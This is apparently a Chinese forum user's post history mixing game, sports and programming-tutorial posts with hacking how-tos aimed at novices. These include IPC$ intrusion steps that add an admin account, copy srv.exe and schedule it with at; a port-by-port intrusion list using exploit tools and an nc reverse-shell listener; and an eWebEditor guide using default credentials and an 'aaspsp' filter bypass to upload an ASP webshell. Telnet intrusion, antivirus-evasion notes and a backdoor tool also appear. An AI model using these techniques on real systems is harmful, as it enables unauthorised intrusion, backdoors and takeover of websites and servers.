人冷新0w
松鼠玛利亚
关注数: 1
粉丝数: 25
发帖数: 3,370
关注贴吧数: 19
大家进来听下这首 再熟悉不过的歌 - -
魔兽再现惊人BUG,治疗轻松过万 末日的回响开放,强大的新天赋以及副本难度大幅下降,让更多的团队也拥有了在WLK前冲击太阳井的机会。许多公会推倒了基尔加丹,许多公会也快了。 一个偶然的机会,有玩家发现团队里奶妈们的治疗可以轻松刷过万,是什么原因让奶如此强力? 细心的玩家发现了原因是奶树身上的光环。 再经过多人不懈的努力下,我们终于发现了这一个秘密。 1:首先让恢复德鲁伊在奎尔丹纳斯岛上喝下血莓药剂。 2:小德变成树再喝下治疗能量药剂。 这时候奶树的光环已经能让你的队友治疗轻松过万
里程碑式的装逼!装逼史上的奇迹! ..
仔细观察这个视频就知道 布什保镖的 数量 战位 攻击力 门后面 大量假冒记者的 很多 10来个记者有一半是冒充的大家有发现可以补充
cike技术交流 VB教程 学习VB我们不能为了学习而学习.我们要抱着喜欢,爱好VB的心态来学习VB你会发现.其实程序也是很好玩的. 对,我说的是玩VB而不是学VB .以下个人废话很多!不过请耐心看完,不要浏览,我表达能力不是很好要慢慢读才可以理解^o^ 经典的c语言教程大家听说过么,我的印象里,所谓的经典c语言教程就是.第一个教你的东西是:在屏幕上显示出”Hellow! C”我们也有样学样吧!.. 现在课程开始: 1.新建立一个exe!>> 在窗体内拖动一个命令按钮(command1) 2.双击命令按钮,>> 弹出代码框!你会看到...>> Private Sub Command1_Click() End Sub 看到了吧!如果你刚接触VB那么你可以先不用管它是什么东西你只要在这两行代码中间输入: Print "hellow! VB" 这个东西就可以了! 然后运行VB后点击那个命令按钮,你就会看到 hellow! VB 这几个字出现在窗体的左上角! 那么看来”hellow! VB”你就算会做了!真的就这样行了??当然不,我的教学绝对不同于你们的老师,这个时候你知道了VB是所谓的”面向对象的编程了么”?不一定清楚吧!那么看以下的对话! 路人甲:”〔hellow! VB〕的编程怎么做?” 路人乙:”建好一个exe后仍一个命令按钮然后双击命令按钮里面写入Print "hellow! VB" 路人甲:”具体怎么操作?” 路人乙:”怎么操作,不是说了么,就是往那个命令按钮里写代码,对这那个命令按钮操作咯.” 路人甲:”好!要的就是你最后那句对着命令按钮操作..乙很厉害啊!一说我就懂了!” 路人乙:”.....” 我还是引用上面的话吧!所谓的面对对象,这个对象简单的理解为面对控件和面对事件,这个不是书本上的观点,那里讲得比较”深奥”现在你只需要这样理解就行了,对于这个以后的详细解释你做东西多了你自然明白了.学程序不可死板的学,要举一反三和灵活运用!如果这个时候你会问:”既然有面对对象之分那么还有面对其它什么吗?”我会想这家伙脑袋灵活啊!不学习编程可惜了!转正题!其实这个我也不清楚!不过我可以告诉你关于其它的东西:传说顶顶大名的windows 其实以消息机制配合函数做出来的.简单的说windows程序原理是N多个东西里面,全都是以消息来传递,拿"hellow! VB"来说,运行上面的那个程序的时候,我们点下了命令按钮,那么就是从命令按钮那里发了一条消息给系统,系统回应命令按钮的消息,发消息给窗体,窗体收到来自系统的消息后回应,调用系统的某某函数在窗体上画上"hellow! VB"字样.我们才可以看到窗体上出现的"hellow! VB"字样.这才是这个编程的本质,其实就是消息传来传去,其复杂程度不是我们想的那么简单的.如果我们还是操作消息的话....那么就没程序员了.所以后来人们想到了新的编程方法,就是面向对象,这样我们只要管往命令按钮里写东西好了,消息如何发送就不是我们考虑的范围了...这样面对消息和面对对象的比较!你是否对所谓的 面对对象有了你的了解了呢!学习还需要有怀疑精神,不要我说什么就是什么,上面那些只是个人的看法,写出来你们参考的,当然有些地方不是很完善,我想有一天你也可以写这些,而且比我写得更好吧! 刚刚我们做了一个 "hellow! VB" 的程序,也大概了解了所谓的面向对象的编程,完了么!没完...刚刚接触VB而且英文不是很好的话...那么就算做出上面的东西那么也不知道什么回事吧!那么接下来我要说的是我自己的学习方法.理解,读懂代码,程序思路仅扣心中... 下面我翻译上面的代码,请你们记住以下单词,这是在背VB而不是英文,记得! private = 表示私有 sub =.... 暂时理解为关键字,恩!就是过程中不可少的一个元素,其他可以变它不可以! command1 = 那个命令按钮的名字 click= 单击 end =结束 print = 打印
【圣战】武汉纯爷们!!!说好的抗(河蟹)议呢 ·
有喜欢忍者乱太郎的吗~~~~~~~~~~~~~ 好怀念 小时候的暑假 .....
大家吃过这种柚子吗?
在电脑右下角显示你女友的名字 庆祝有精品了 点开始----设置----控制面板---区域和语言(98是区域设置)选项-----自定义----时 间----时间格式 (T)里的H:mm:ss前加两个tt ttH:mm:ss 如果你想让你爱人的名字在时间的后面显示,你可以把tt打在后面 H:mm:sstt 之后在AM符号(M):里打上你爱人的名字 在PM符号(P):里也打上你爱人的名字 点应用/确定OK了完成.在屏幕上刷新一下,在看看你右下角时间前是不是有你爱人的名字了?
一些cmd命令 打开IPC$命令 net start lanmanserver 查看服务器时间 net time \\127.0.0.1 打开telnet服务 net start telnet 打开ftp服务器 net start ftpserver 添加用户 net user /add 加入admin net localgroup administrators 用户名 /add 启动win2k的终端控制 net start termservice� //如果只有在对方安装了终端~并且当前状态暂停的时候才有效! 打开计划任务 net start schedule 打开net use功能 net start workstation 查看服务器时间 net time \\127.0.0.1 查看端口和连接 netstat -a -n 运行指定程序 at \\127.0.0.1 (当前服务器时间) (运行的程序) //例如你有这个服务器的FTP帐号并且在e:\web你穿了一个srv.exe可以写成 at \\127.0.0.1 09:27 srv.exe 因为SQL所以IP必须都为127.0.0.1 sc \\127.0.0.1 query termservice 命令看看他有没有安终端,如果反馈里边有Running就说明他已经启动啦终端,如果没启动,就用 sc \\127.0.0.1 config termservice start=auto 给他开个3389 等屏幕上出现 success 你应该懂他是什么意识,不懂查字典。 以上命令菜鸟必备!!
我有个精品了........- - http://tieba.baidu.com/f?kz=516328523
美丽的WOW 发些图吧 估计WLK不会玩了 从艾萨拉 开始吧
有没有有人出过这个帽子
各位WOWER眼睛保健操最喜欢做哪一节?
Telnet高级入侵攻略 什么是Telnet 对于Telnet的认识,不同的人持有不同的观点,可以把Telnet当成一种通信协议,但是对于入侵者而言,Telnet只是一种远程登录的工具。一旦入侵者与远程主机建立了Telnet连接,入侵者便可以使用目标主机上的软、硬件资源,而入侵者的本地机只相当于一个只有键盘和显示器的终端而已。 2.Telnet被入侵者用来做什么 (1)Telnet是控制主机的第一手段 在前几节介绍过,如果入侵者想要在远程主机上执行命令,需要建立IPC$连接,然后使用net time命令查看系统时间,最后使用at命令建立计划任务才能完成远程执行命令。虽然这种方法能够远程执行命令,但相比之下,Telnet方式对入侵者而言则会方便得多。入侵者一旦与远程主机建立Telnet连接,就可以像控制本地计算机一样来控制远程计算机。可见,Telnet方式是入侵者惯于使用的远程控制方式,当他们千方百计得到远程主机的管理员权限后,一般都会使用Telnet方式进行登录。 (2)用来做跳板 入侵者把用来隐身的肉鸡称之为“跳板”,他们经常用这种方法,从一个“肉鸡”登录到另一个“肉鸡”,这样在入侵过程中就不会暴露自己的IP地址,这一过程将在第5章中详细介绍。 3.关于NTLM验证 由于Telnet功能太强大,而且也是入侵者使用最频繁的登录手段之一,因此微软公司为Telnet添加了身份验证,称为NTLM验证,它要求Telnet终端除了需要有Telnet服务主机的用户名和密码外,还需要满足NTLM验证关系。NTLM验证大大增强了Telnet主机的安全性,就像一只拦路虎把很多入侵者拒之门外。 4.使用Telnet登录 登录命令:telnet HOST [PORT] 断开Telnet连接的命令:exit 成功地建立Telnet连接,除了要求掌握远程计算机上的账号和密码外,还需要远程计算机已经开启“Telnet服务”,并去除NTLM验证。也可以使用专门的Telnet工具来进行连接,比如STERM,CTERM等工具。 2.3.2 Telnet典型入侵 1.Telnet典型入侵步骤 步骤一:建立IPC$连接。其中sysback是前面建立的后门账号,命令如图所示。 步骤二:开启远程主机中被禁用的Telnet服务,如图所示。 步骤三:断开IPC$连接,如图所示。
命令行下添加SQL用户的简单方法 需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下: exec master.dbo.sp_addlogin test,123 EXEC sp_addsrvrolemember 'test, 'sysadmin' 然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry
cike技术交流 VB教程 学习VB我们不能为了学习而学习.我们要抱着喜欢,爱好VB的心态来学习VB你会发现.其实程序也是很好玩的. 对,我说的是玩VB而不是学VB .以下个人废话很多!不过请耐心看完,不要浏览,我表达能力不是很好要慢慢读才可以理解^o^ 经典的c语言教程大家听说过么,我的印象里,所谓的经典c语言教程就是.第一个教你的东西是:在屏幕上显示出”Hellow! C”我们也有样学样吧!.. 现在课程开始: 1.新建立一个exe!>> 在窗体内拖动一个命令按钮(command1) 2.双击命令按钮,>> 弹出代码框!你会看到...>> Private Sub Command1_Click() End Sub 看到了吧!如果你刚接触VB那么你可以先不用管它是什么东西你只要在这两行代码中间输入: Print "hellow! VB" 这个东西就可以了! 然后运行VB后点击那个命令按钮,你就会看到 hellow! VB 这几个字出现在窗体的左上角! 那么看来”hellow! VB”你就算会做了!真的就这样行了??当然不,我的教学绝对不同于你们的老师,这个时候你知道了VB是所谓的”面向对象的编程了么”?不一定清楚吧!那么看以下的对话! 路人甲:”〔hellow! VB〕的编程怎么做?” 路人乙:”建好一个exe后仍一个命令按钮然后双击命令按钮里面写入Print "hellow! VB" 路人甲:”具体怎么操作?” 路人乙:”怎么操作,不是说了么,就是往那个命令按钮里写代码,对这那个命令按钮操作咯.” 路人甲:”好!要的就是你最后那句对着命令按钮操作..乙很厉害啊!一说我就懂了!” 路人乙:”.....” 我还是引用上面的话吧!所谓的面对对象,这个对象简单的理解为面对控件和面对事件,这个不是书本上的观点,那里讲得比较”深奥”现在你只需要这样理解就行了,对于这个以后的详细解释你做东西多了你自然明白了.学程序不可死板的学,要举一反三和灵活运用!如果这个时候你会问:”既然有面对对象之分那么还有面对其它什么吗?”我会想这家伙脑袋灵活啊!不学习编程可惜了!转正题!其实这个我也不清楚!不过我可以告诉你关于其它的东西:传说顶顶大名的windows 其实以消息机制配合函数做出来的.简单的说windows程序原理是N多个东西里面,全都是以消息来传递,拿"hellow! VB"来说,运行上面的那个程序的时候,我们点下了命令按钮,那么就是从命令按钮那里发了一条消息给系统,系统回应命令按钮的消息,发消息给窗体,窗体收到来自系统的消息后回应,调用系统的某某函数在窗体上画上"hellow! VB"字样.我们才可以看到窗体上出现的"hellow! VB"字样.这才是这个编程的本质,其实就是消息传来传去,其复杂程度不是我们想的那么简单的.如果我们还是操作消息的话....那么就没程序员了.所以后来人们想到了新的编程方法,就是面向对象,这样我们只要管往命令按钮里写东西好了,消息如何发送就不是我们考虑的范围了...这样面对消息和面对对象的比较!你是否对所谓的 面对对象有了你的了解了呢!学习还需要有怀疑精神,不要我说什么就是什么,上面那些只是个人的看法,写出来你们参考的,当然有些地方不是很完善,我想有一天你也可以写这些,而且比我写得更好吧! 刚刚我们做了一个 "hellow! VB" 的程序,也大概了解了所谓的面向对象的编程,完了么!没完...刚刚接触VB而且英文不是很好的话...那么就算做出上面的东西那么也不知道什么回事吧!那么接下来我要说的是我自己的学习方法.理解,读懂代码,程序思路仅扣心中... 下面我翻译上面的代码,请你们记住以下单词,这是在背VB而不是英文,记得! private = 表示私有 sub =.... 暂时理解为关键字,恩!就是过程中不可少的一个元素,其他可以变它不可以! command1 = 那个命令按钮的名字 click= 单击 end =结束 print = 打印 路人甲,乙.....
C基础教材 C基础教材(一、C语言概述) 文章作者:evilknight 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 第一章: C语言概述 节1.1 编绎环境介绍 这里只是简单的介绍一下我们的编绎环境,关于C的历史这些,在课件里有,这个课件是我当时参加黑客X档案举办的那个C写后门与后门技术的C基础课件,我会打包一起附上来的。注:课件是以C90为基础的,我是以C99标准写的这份快速入门的 C基础教材,所以请大家注意区分。 这也是本人第一次写这类的教材,不足以及错误之处请大家火速指出,以免误导初学者,呵呵。 现在先简单的介绍一下编绎环境吧,如果是windows用户的话建议使用Dev-c++编绎器(4.9.9.2这个版本),Dev-cpp是一个GCC在win32下的IDE程序,用Dephi 5编写,只有2M,给出一个下载地址:http://milanfff.vip72.25idc.com/soft/program/devcpp-4.9.9.2_setup.exe 如果是linux平台的话直接就可以使用GCC了. 节1.2 一个简单的C语言实例 介绍了编绎环境,现在让我们来看一个简单的C程序: #include int main(void) { printf(\"Hello World.......\\n\"); return 0; } 上面就是一个简单的,很经典的一个程序入门的程序,下面我们依次对程序的每一行进行分析. #include 这行就是告诉编绎器包含文件stdio.h中的全部信息,stdio.h是所有C语言编绎包的一个标准部分,标准的输入输出(standard input/output header)。#include 可能大家还注意到了这个,在C中预处理指令(preprocessor directive)都是以# 号开头的,注意,预处理指令可不是C语言的语句哦,这个我们在以后的章节会祥细说明的。 int main(void) 可能看到这里有些人会问,怎么我看到有些人写的是void main(void)的呢,我可以很明确的告诉你,他这样写是错的,C/C++ 中从来没有定义过void main( ) 。C++ 之父 Bjarne Stroustrup 在他的主页上的 FAQ 中明确地写着 The definition void main( ) { /* ... */ } is not and never has been C++, nor has it even been C.( void main( ) 从来就不存在于 C++ 或者 C ),那他的代码为什么可以在VC6.0编绎器中通过编绎呢,因为VC6.0出生的年代以以及他对类型的检测不严格,所以导致这个错误的代码可以编绎。 C程序中包含一个或者多个函数,且必须要有一个主函数(main)也只能只有一个主函数,函数前的int型表明此函数的返回值是整型,大家也可能注意到 main括号里面的void了,这里为什么要用void呢,为什么不写int argc, char **argv呢,因为函数名后面的圆括号里一般包含传递传递给函数的信息,因为我们不用他传递任何信息,所以为空(具体的关于函数传递的细节我们在以后也会祥讲的),可能还会有人问,那不用他传递,我们直接留空就行了,在这里大家要注意一下,如果是C++的话你可以留空,如果是C的话,请写上一个 void.在C中函数名后面的圆括号为空,并不表示他不接受任何参数信息,而是表示他愿意接受一切,而C++函数后面的圆括号为空则表示不接受任何参数信息,大家有意识的区分一下。 { statement; } 在C中所有的函数都是使用花括号来表函数体的开始与结束,他们存在是必不可少的,也只能由花括号,不能由小括号,中括号取代,同时花括号还可以用来把函数中的语句聚集到一个单元或代码块中。 printf (\"Hello World.......\\n\"); 函数调用,这个是C语言的一个标准函数,圆括号表明printf是一个函数名,圆括号中包括的内容是从函数main()传递到函数printf ()的信息,程序将如何处理printf()里的参数呢?大家可能也注意到了\"Hello World.......\\n\"没错,程序就是通过识别两个双引号里面的内容.大家也可能注意到了后面有一个\\n,这个代表换行,关于\\n这些转义字符我会在讲数据类型的时候祥讲的。 return 0; 最后一个了,哎,打字打到手好累,这里return 0;的意思是返回一个0给main() 函数,操作系统通过main() 的返回值来判断程序是否结束,返回0表示程序正常结束,在大多数系统中,main的返回值是状态标识。返回值为0表明main成功执行了。其它的返回值的意义由操作系统来定义。通常非0的返回值表明发生了错误。每个操作系统都由自身的、用于告诉用户main函数返回值的途径。
eWebEditor 漏洞 eWebEditor 漏洞 各位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦! 漏洞利用 利用eWebEditor获得WebShell的步骤大致如下: 1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。 2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID='eWebEditor1' src='/edit/ewebeditor.asp?id=content&style=web' frameborder=0 scrolling=no width='550' HEIGHT='350'></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了eWebEditor。然后记下src='***'中的“***”,这就是eWebEditor路径。 3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。 如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)! 4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。 然后在上传的文件类型中增加“asa”类型。 5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。 漏洞原理 漏洞的利用原理很简单,请看Upload.asp文件: 任何情况下都不允许上传asp脚本文件 sAllowExt = replace(UCase(sAllowExt), "ASP", "") 因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧! 高级应用 eWebEditor的漏洞利用还有一些技巧: 1.使用默认用户名和密码无法登录。 请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法****,那就当自己的运气不好了。 2.加了asa类型后发现还是无法上传。 应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看见过一个站长是这样修改的: sAllowExt = replace(replace(replace(replace(replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", "") 猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了“asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。 3.上传了asp文件后,却发现该目录没有运行脚本的权限。 呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。 4.已经使用了第2点中的方法,但是asp类型还是无法上传。 看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的“asp”删除。 后记 根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索“ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!
把任意文件隐藏在一张图片里 该技巧适用于 2000 / XP / Vista最好有基本的命令行知识。不过也没关系,按照下面的步骤做就行了。准备:1.一张图片 2.一个做试验的txt文件 3.WinRAR步骤: 1:准备一张图片,比如 winshome.jpg。准备目标文件,比如test.txt。我们要实现把test.txt隐藏在图片里面。 2:把要隐藏的文件 test.txt 用 WinRAR 压缩。生成 test.rar 压缩包 3:打开命令行提示符:点击“开始→运行”,输入“cmd”。 4:我们假设中两个文件都存放在“ D:”下。输入命令:copy /b D:winshome.jpg + D:test.rar D:winshome.jpg 5:ok,试试打开生成的图片 winshome.jpg,没错吧,的的确确是原来的图片。 6:怎样打开那个 txt 文件?打开 WinRAR ,点击“文件→打开(快捷键 Ctrl + O )”,然后选择文件类型为“所有文件”,找到 winshome.jpg ,选择打开看看,是不是有个 txt 文件?这种方法适用于所有文件(基本上在没有工具的时候可以用此方法)。
5台有直播中国跟阿曼比赛 大家速度上 可能有大帝.. 泪流满面
5台有直播中国跟阿曼比赛 大家速度上 大帝上否
如果《越狱》登陆央视将被翻译成什么名字.......选项来自D8
免杀技术全揭密!~ 免杀技术全揭密!~ 一.关于免杀的来源 为了让我们的木马在各种杀毒软件的威胁下活的更久. 二.什么叫免杀和查杀 可分为二类: 1.文件免杀和查杀:不运行程序用杀毒软件进行对该程序的扫描,所得结果。 2.内存的免杀和查杀:判断的方法1>运行后,用杀毒软件的内存查杀功能. 2>用OD载入,用杀毒软件的内存查杀功能.
20只藏獒在树下围攻一只老虎,极为惨烈 藏獒藏獒藏獒藏獒藏獒藏獒藏獒 藏獒 藏獒 藏獒 老虎 藏獒 藏獒 藏獒 藏獒藏獒藏獒藏獒藏獒藏獒藏獒
今晚22点19 CCAV6播放日本沉没 大家一起看 今天放是有深意的
发现WOW吧秘密基地.......内有传送门 http://tieba.baidu.com/f?ct=&tn=&rn=&pn=&lm=&sc=&kw=vvovv&rs2=0&myselectvalue=1&word=vvovv&tb=on#
内有传送门 自备墨镜 不多说了 http://tieba.baidu.com/f?ct=&tn=&rn=&pn=&lm=&sc=&kw=vvovv&rs2=0&myselectvalue=1&word=vvovv&tb=on
【贴吧五周年】我也个言..
我真是一个傻子.......哈哈哈哈 verschwinden
总结各个端口的入侵 总结各个端口的入侵1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后 SQLTools.exe入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 2. 4899端口入侵 用4899过滤器.exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。(tscrack.exe) 4. 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。(啊D的注入软件)。 5. serv-u入侵(21端口) 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码 6. 554端口 用real554.exe入侵。 7. 6129端口 用DameWare6129.exe入侵。 8. 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 9. 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 10. 其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。 经典IPC$入侵 1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators" 这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连 接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名 ,输入administrators,命令即可成功完成。 2. C:\>copy srv.exe $">\\127.0.0.1\admin$ 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的 c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。 3. C:\>net time [url=file://127.0.0.1/]\\127.0.0.1[/url] 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。 4. C:\>at http://tieba.baidu.com/mo/q/checkurl?url=file%3A%2F%2F%5C%5C127.0.0.1&urlrefer=8937724da4adb96595b1917d51a3fde4http://tieba.baidu.com/mo/q/checkurl?url=file%3A%2F%2F%5C%5C127.0.0.1&urlrefer=8937724da4adb96595b1917d51a3fde4
清除垃圾 @echo off echo 正在清除系统垃圾文件,请稍等...... del /f /s /q %systemdrive%\*.tmp del /f /s /q %systemdrive%\*._mp del /f /s /q %systemdrive%\*.log del /f /s /q %systemdrive%\*.gid del /f /s /q %systemdrive%\*.chk del /f /s /q %systemdrive%\*.old del /f /s /q %systemdrive%\recycled\*.* del /f /s /q %windir%\*.bak del /f /s /q %windir%\prefetch\*.* rd /s /q %windir%\temp & md %windir%\temp del /f /q %userprofile%\COOKIES s\*.* del /f /q %userprofile%\recent\*.* del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*" del /f /s /q "%userprofile%\Local Settings\Temp\*.*" del /f /s /q "%userprofile%\recent\*.*" sfc /purgecache '清理系统盘无用文件 defrag %systemdrive% -b '优化预读信息 echo 清除系统LJ完成! echo. & pause 复制完保存,就是点记事本左上角的 文件 , 选保存 ,然后更名为“清除系统LJ.bat”
asp'or'='or' 的漏洞 ASP只是一种技术,只是一种运行环境,并不是后台管理系统都是asp的,也可以是PHP或JSP或CGI或ASPX或其它的技术的,只不过ASP是目前比较流行的技术罢了。 'or'='or' 的漏洞,只不过是程序书写时的逻辑漏洞了,并不是ASP本身的漏洞,这种漏洞叫“Injection注入漏洞”,它的原理是这样的: 当用户输入用户名和密码时,提交一个精心构造的用户名“a or username<>'a”,密码是:“a or pwd<>'a”,而程序的判断语句是:select * from user_table where username=用户名 and pwd=密码 但是,把上面的用户名和密码带起去后就变成:select * from user_table where username=a or username<>a and pwd=a or pwd<>a,就变成上面的SQL语句了,在这种情况下,就出现了逻辑漏洞了,程序会认为用户名和密码都正确,就会把用户名赋给正确的session,这样就进入后台了,解决办法是用replace()函数过滤掉“'”,再次就是用户名和密码的输入框里限制输入的字符数,其实,如果对方不知道用户名和密码在数据库里的字段的话,是无法破解成功的。
友情连接弄好了~~~ ..给我一个?
欢迎来到 松鼠玛利亚 吧 申请个会员再走嘛 http://tieba.baidu.com/f?ct=&tn=&rn=&pn=&lm=&sc=&kw=%CB%C9%CA%F3%C2%EA%C0%FB%D1%C7&rs2=0&myselectvalue=1&word=%CB%C9%CA%F3%C2%EA%C0%FB%D1%C7&tb=on欢迎~
美丽的WOW 发些图吧 估计WLK不会玩了 从艾萨拉 开始吧
在过去的燃烧的远征中你最喜欢的地图是?
巴萨打皇马 凌晨5点你看否
非常牛B非常娴熟的职业玩家教你打远祖滩头
都2点了啊....突然醒了 刚才突然醒了 现在睡不着了
教你在QQ空间里写会移动的字 首先在你写日志的时候,写好你想写的内容,然后在内容的前面加入(marque),内容后面加入(/marque),然后发表文章即可!例:(marque)此处为你所写的内容(/marque)说明:请将文中所有的小括号()以中括号〔〕替换,大家看看效果如何? [marque]怎么样?学会了吗?不懂留言哦`````[/marque] 论坛上要用ubb代码格式 在标签的中间插入文字可以实现文字飞翔效果,类似跑马灯。 代码:内容在标签的中间插入文字可以实现文字移动效果,为来回飘动。代码:[move]文字[/move]你需要的内容打到我“内容”最后还有如果网友不懂请仔细阅读反复试验就会了!
一个非常隐蔽的极少人知道的只有斯巴达知道的隐蔽斯巴达帖吧 被我发现了
举报 小榕 吧 吧主 cnmao 半年未上线 长期不管理吧务 请求撤职
很久很久以前 有一个传说.. 有个人 名字叫松鼠玛利亚
对付强行卸载彩虹QQ的方法 对付强行卸载彩虹QQ的方法 非法QQ外挂解决办法,绝对可行删除\Tencent\SafeBase下的tsfsres.dat.同时在\Tencent\SafeBase新建文件夹,命名为:"tsfsres.dat"(记住,是新建文件夹,不是文件,这个很重要) 接着: 还是在SafeBase这个文件夹,然后把文件夹里面的文件全部删除掉,然后把QQUpdateCenter.EXE和selfupdate.exe删除,再新建两个TXT文本,然后分别改名成QQUpdateCenter.exe和selfupdate.exe(记得改扩展名)。然后用彩虹登陆QQ。 反正就是删了SafeBase文件夹全部文件,再建两个TXT文本文件命名成同样的就好了,如果还有什么不懂的或是更好的办法,反秀给大家吧。 注:tsfsres.dat就是导致这次非法外挂的元凶,所以要删除 新件文件夹"tsfsres.dat"的目的就是防止该流氓再次捣乱 因为WINDOWS新建文件时只验证文件名而不验证文件类型. 相信我的就用 啦 所以在有文件夹"tsfsres.dat"的情况下无法再生成文件tsfsres.dat 又因为是文件夹,即使QQ想替换或修改该文件都不可以 而QQUpdateCenter.exe和selfupdate.exe这两个文件是QQ医生的,他会更新tsfsres.dat,所以把它也一起改了,虽然改了会使QQ医生不能使用,但有杀毒软件和360那QQ医生就是个鸡肋。
如何使用小榕的RemoteNC 保留自己后门 RemoteNC 在小榕网站可以下
要开始发些东西了..
全海小学上深圳电视台“第一现场”了 笑死我了 看看有没有你的马甲 http://v.youku.com/v_show/id_XNTcwNjkwMDQ=.html深圳电视台“第一现场”
北京奥运会
对付强行卸载彩虹QQ的方法 庆祝解封 对付强行卸载彩虹QQ的方法 非法QQ外挂解决办法,绝对可行删除\Tencent\SafeBase下的tsfsres.dat.同时在\Tencent\SafeBase新建文件夹,命名为:"tsfsres.dat"(记住,是新建文件夹,不是文件,这个很重要) 接着: 还是在SafeBase这个文件夹,然后把文件夹里面的文件全部删除掉,然后把QQUpdateCenter.EXE和selfupdate.exe删除,再新建两个TXT文本,然后分别改名成QQUpdateCenter.exe和selfupdate.exe(记得改扩展名)。然后用彩虹登陆QQ。 反正就是删了SafeBase文件夹全部文件,再建两个TXT文本文件命名成同样的就好了,如果还有什么不懂的或是更好的办法,反秀给大家吧。 注:tsfsres.dat就是导致这次非法外挂的元凶,所以要删除 新件文件夹"tsfsres.dat"的目的就是防止该流氓再次捣乱 因为WINDOWS新建文件时只验证文件名而不验证文件类型. 相信我的就用 啦所以在有文件夹"tsfsres.dat"的情况下无法再生成文件tsfsres.dat 又因为是文件夹,即使QQ想替换或修改该文件都不可以 而QQUpdateCenter.exe和selfupdate.exe这两个文件是QQ医生的,他会更新tsfsres.dat,所以把它也一起改了,虽然改了会使QQ医生不能使用,但有杀毒软件和360那QQ医生就是个鸡肋。
中国10大黑客 1LBD 也许会不让发..
看看 看看 看看 什么意思
举报:有人在东方神起吧设置了会员功能以致不能爆吧!!! 管理员处理下
举报:有人在东方神起吧设置了会员功能以致我们不能爆吧!!! 请管理员处理
